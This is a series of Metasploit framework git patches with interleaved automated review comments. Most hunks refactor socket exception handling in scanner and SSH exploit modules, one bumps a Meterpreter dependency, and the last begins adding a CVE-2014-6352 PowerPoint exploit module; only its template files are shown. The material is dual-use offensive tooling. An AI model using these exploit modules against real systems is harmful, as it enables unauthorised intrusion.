AddressInUse < ConnectionError include SocketError include HostCommunicationError def to_s - "The address is already in use #{addr_to_s}." + "The address is already in use or unavailable: #{addr_to_s}." end end + ### # # This exception is raised when an unsupported internet protocol is specified. diff --git a/lib/rex/post/meterpreter/ui/console.rb b/lib/rex/post/meterpreter/ui/console.rb index 550c37175e..3b2519d324 100644 --- a/lib/rex/post/meterpreter/ui/console.rb +++ b/lib/rex/post/meterpreter/ui/console.rb 
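Review bot: The backward-compatibility comment on AddressInUse overstates the situation: neither BindFailed nor InvalidDestination inherits from AddressInUse, and after this change nothing raises AddressInUse any more, so a caller that rescues only Rex::AddressInUse now catches nothing; compatibility holds only where ConnectionError is also rescued (InvalidDestination) and never for BindFailed, which derives from ArgumentError. The comment should say so, e.g. `# Nothing raises this class any more; callers that rescued only AddressInUse must now rescue BindFailed and/or InvalidDestination.` The BindFailed comment also carries a typo and punctuation slip in `already in use or onot available occurs. such as`, which should read `# already in use or not available occurs, such as binding to a host on a`.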
@@ -106,7 +106,7 @@ class Console log_error("Operation timed out.") rescue RequestError => info log_error(info.to_s) - rescue Rex::AddressInUse => e + rescue Rex::InvalidDestination => e log_error(e.message) rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError self.client.kill diff --git a/lib/rex/socket/comm/local.rb b/lib/rex/socket/comm/local.rb index 98908c96eb..82c843a6c3 100644 --- a/lib/rex/socket/comm/local.rb +++ b/lib/rex/socket/comm/local.rb @@ -195,7 +195,7 @@ class Rex::Socket::Comm::Local rescue ::Errno::EADDRNOTAVAIL,::Errno::EADDRINUSE sock.close - raise Rex::AddressInUse.new(param.localhost, param.localport), caller + raise Rex::BindFailed.new(param.localhost, param.localport), caller end end @@ -295,7 +295,7 @@ class Rex::Socket::Comm::Local rescue ::Errno::EADDRNOTAVAIL,::Errno::EADDRINUSE sock.close - raise Rex::AddressInUse.new(ip, port), caller + raise Rex::InvalidDestination.new(ip, port), caller rescue Errno::ETIMEDOUT sock.close diff --git a/modules/auxiliary/gather/xerox_pwd_extract.rb b/modules/auxiliary/gather/xerox_pwd_extract.rb index 92a33b2cbc..7ba3ac620c 100644 --- a/modules/auxiliary/gather/xerox_pwd_extract.rb +++ b/modules/auxiliary/gather/xerox_pwd_extract.rb @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary begin connect(true, 'RPORT' => jport) sock.put(create_print_job) - rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse + rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout print_error("#{rhost}:#{jport} - Error connecting to #{rhost}") ensure disconnect 
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary res = sock.get_once || '' passwd = res.match(/\r\n\s(.+?)\n/) return passwd ? passwd[1] : '' - rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse, EOFError + rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, ::EOFError print_error("#{rhost}:#{jport} - Error getting password from #{rhost}") return ensure @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary begin connect(true, 'RPORT' => jport) sock.put(remove_print_job) - rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse + rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}") ensure disconnect diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index 46846c8189..62cd727715 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary begin sd = Rex::Socket.create_tcp_server('LocalPort' => stderr_port) - rescue Rex::AddressInUse + rescue Rex::BindFailed # Ignore and try again end diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index ba01be2362..7bb64ca213 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary begin sd = Rex::Socket.create_tcp_server('LocalPort' => lport) - rescue Rex::AddressInUse + rescue Rex::BindFailed # Ignore and try again end 
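Review bot: The rewritten rescue list in the second xerox_pwd_extract hunk still names `::EOFError` twice (`rescue ::EOFError, ::Timeout::Error, ..., Rex::ConnectionTimeout, ::EOFError`); the change removed the AddressInUse entry but kept the duplicate, which should be dropped. Rex::ConnectionTimeout is a subclass of Rex::ConnectionError (visible in the exceptions.rb hunk above), and ConnectionRefused and HostUnreachable presumably are as well, so all three rescue lists in this file can shrink to `rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError`. The same shortening applies to the hunks at the old lines 96 and 150 of the same file.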
diff --git a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb index 708447987d..24e141f588 100644 --- a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary begin transport = Net::SSH::Transport::Session.new(ip, options) - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return :connection_error end @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary :fail end end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return :connection_error rescue Net::SSH::Disconnect, ::EOFError return :success diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index bf77ecc502..b4df478b0a 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary ::Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(ip, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return :connection_error rescue Net::SSH::Disconnect, ::EOFError return :success diff --git a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb index 8f35117c9b..6a35873c0c 100644 --- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb @@ -226,7 +226,7 @@ class Metasploit3 < Msf::Auxiliary ::Timeout.timeout(1) { ssh_socket.close if ssh_socket } rescue nil - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return :connection_error rescue Net::SSH::Disconnect, ::EOFError return :connection_disconnect 
diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index e5a1a27e31..1cb15a9101 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 8e73c77db4..7a460a0ac6 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index b2b3f333d8..711684f430 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" 
diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 56f0183919..e8fdfc48b3 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index 19b837dd45..6c60536356 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index ad1a0d53e8..96f568d23b 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end - rescue Rex::ConnectionError, Rex::AddressInUse + rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index b21d9e4472..a2a1cc65af 100644 
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
- rescue Rex::ConnectionError, Rex::AddressInUse
+ rescue Rex::ConnectionError
fail_with(Failure::Unreachable, 'Disconnected during negotiation')
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, 'Timed out during negotiation')
diff --git a/modules/exploits/unix/misc/xerox_mfp.rb b/modules/exploits/unix/misc/xerox_mfp.rb
index e9e485e6a3..64b8255efb 100644
--- a/modules/exploits/unix/misc/xerox_mfp.rb
+++ b/modules/exploits/unix/misc/xerox_mfp.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
connect
sock.put(firmcode)
handler
- rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e
+ rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
print_error("#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
index ca742cfe1a..002e91cde3 100644
--- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
+++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
@@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, user, opts)
end
- rescue Rex::ConnectionError, Rex::AddressInUse
+ rescue Rex::ConnectionError
fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
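Review bot: In the array_vxag_vapv_privkey_privesc.rb hunk the failure message on the line right after the new rescue still reads "Connection error or address in use", but Rex::AddressInUse is no longer rescued there, so the text now describes a case that branch can never see. Suggest `fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error")` so the message matches the exception actually handled. In the sshexec.rb hunk on the same line the neighbouring messages look swapped ('Disconnected during negotiation' for a connection error, 'Timed out during negotiation' for a disconnect/EOF); that is pre-existing context rather than new code, but worth fixing while the rescue clauses are being touched. Both enclosing methods start and end outside their hunks.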
diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb
index 0a963a2a1a..c2931b66be 100644
--- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb
+++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb
@@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
c = do_login(datastore['USERNAME'])
end
- rescue Rex::ConnectionError, Rex::AddressInUse
+ rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
From fb751e3b9f355d9b3bb15b4b64c8a262ba0a8f95 Mon Sep 17 00:00:00 2001
From: OJ
Date: Wed, 12 Nov 2014 07:21:00 +1000
Subject: [PATCH 22/38] Update meterpreter_bins to 0.0.11
This adds support for the getsid command in the binaries.
---
Gemfile.lock | 6 +++---
metasploit-framework.gemspec | 2 +-
2 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index f70b6a4cb1..d01e250f78 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
json
metasploit-concern (~> 0.3.0)
metasploit-model (~> 0.28.0)
- meterpreter_bins (= 0.0.10)
+ meterpreter_bins (= 0.0.11)
msgpack
nokogiri
packetfu (= 1.1.9)
@@ -132,7 +132,7 @@ GEM
pg
railties (< 4.0.0)
recog (~> 1.0)
- meterpreter_bins (0.0.10)
+ meterpreter_bins (0.0.11)
method_source (0.8.2)
mime-types (1.25.1)
mini_portile (0.6.0)
@@ -212,7 +212,7 @@ GEM
multi_json (~> 1.0)
rack (~> 1.0)
tilt (~> 1.1, != 1.3.0)
- sqlite3 (1.3.9)
+ sqlite3 (1.3.10)
thor (0.19.1)
tilt (1.4.1)
timecop (0.7.1)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 3832bd8053..5dcc869611 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model', '~> 0.28.0'
# Needed for Meterpreter on Windows, soon others.
- spec.add_runtime_dependency 'meterpreter_bins', '0.0.10'
+ spec.add_runtime_dependency 'meterpreter_bins', '0.0.11'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# Needed by anemone crawler
From c35dc2e6b3bf51c55d15b26bf3c1f28aaec13c6f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 Date: Wed, 12 Nov 2014 01:10:49 -0600 Subject: [PATCH 23/38] Add module for CVE-2014-6352 --- .../template_run_as_admin/[Content_Types].xml | 2 + .../template_run_as_admin/_rels/.rels | 2 + .../template_run_as_admin/docProps/app.xml | 2 + .../template_run_as_admin/docProps/core.xml | 2 + .../docProps/thumbnail.jpeg | Bin 0 -> 4096 bytes .../ppt/_rels/presentation.xml.rels | 2 + .../ppt/drawings/_rels/vmlDrawing1.vml.rels | 2 + .../ppt/drawings/vmlDrawing1.vml | 31 ++++ .../ppt/media/image1.wmf | Bin 0 -> 3722 bytes .../template_run_as_admin/ppt/presProps.xml | 2 + .../ppt/presentation.xml | 13 ++ .../slideLayouts/_rels/slideLayout1.xml.rels | 2 + .../slideLayouts/_rels/slideLayout10.xml.rels | 2 + .../slideLayouts/_rels/slideLayout11.xml.rels | 2 + .../slideLayouts/_rels/slideLayout2.xml.rels | 2 + .../slideLayouts/_rels/slideLayout3.xml.rels | 2 + .../slideLayouts/_rels/slideLayout4.xml.rels | 2 + .../slideLayouts/_rels/slideLayout5.xml.rels | 2 + .../slideLayouts/_rels/slideLayout6.xml.rels | 2 + .../slideLayouts/_rels/slideLayout7.xml.rels | 2 + .../slideLayouts/_rels/slideLayout8.xml.rels | 2 + .../slideLayouts/_rels/slideLayout9.xml.rels | 2 + .../ppt/slideLayouts/slideLayout1.xml | 2 + .../ppt/slideLayouts/slideLayout10.xml | 2 + .../ppt/slideLayouts/slideLayout11.xml | 2 + .../ppt/slideLayouts/slideLayout2.xml | 2 + .../ppt/slideLayouts/slideLayout3.xml | 2 + .../ppt/slideLayouts/slideLayout4.xml | 2 + .../ppt/slideLayouts/slideLayout5.xml | 2 + .../ppt/slideLayouts/slideLayout6.xml | 2 + .../ppt/slideLayouts/slideLayout7.xml | 2 + .../ppt/slideLayouts/slideLayout8.xml | 2 + .../ppt/slideLayouts/slideLayout9.xml | 2 + .../slideMasters/_rels/slideMaster1.xml.rels | 2 + .../ppt/slideMasters/slideMaster1.xml | 2 + .../ppt/slides/_rels/slide1.xml.rels | 2 + .../ppt/slides/slide1.xml | 2 + .../template_run_as_admin/ppt/tableStyles.xml | 2 + .../ppt/theme/theme1.xml | 2 + .../template_run_as_admin/ppt/viewProps.xml | 2 + 
.../ms14_064_packager_run_as_admin.rb | 153 ++++++++++++++++++ 41 files changed, 269 insertions(+) create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/docProps/thumbnail.jpeg create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/_rels/presentation.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/media/image1.wmf create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels create mode 100755 
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml create mode 
100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml create mode 100755 data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml create mode 100644 modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml b/data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml new file mode 100755 index 0000000000..f35276fe52 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels new file mode 100755 index 0000000000..7100d4b140 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml new file mode 100755 index 0000000000..07343b6ed9 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml @@ -0,0 +1,2 @@ + +372Microsoft Office PowerPointOn-screen Show (4:3)21000falseTheme1Embedded OLE Servers1Slide Titles1Office ThemePackager Shell ObjectExamplefalsefalsefalse14.0000 \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml new file mode 100755 index 0000000000..459a8fcf5c --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml @@ -0,0 +1,2 @@ + +ExampleWindows User92014-08-06T07:56:10Z2014-11-12T06:36:10Z \ No newline at end of file 
diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/thumbnail.jpeg b/data/exploits/CVE-2014-6352/template_run_as_admin/docProps/thumbnail.jpeg new file mode 100755 index 0000000000000000000000000000000000000000..c8eab23be65d2fb01c6c056872b4993f69301d8a GIT binary patch literal 4096 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 + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels new file mode 100755 index 0000000000..f4997f5635 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git 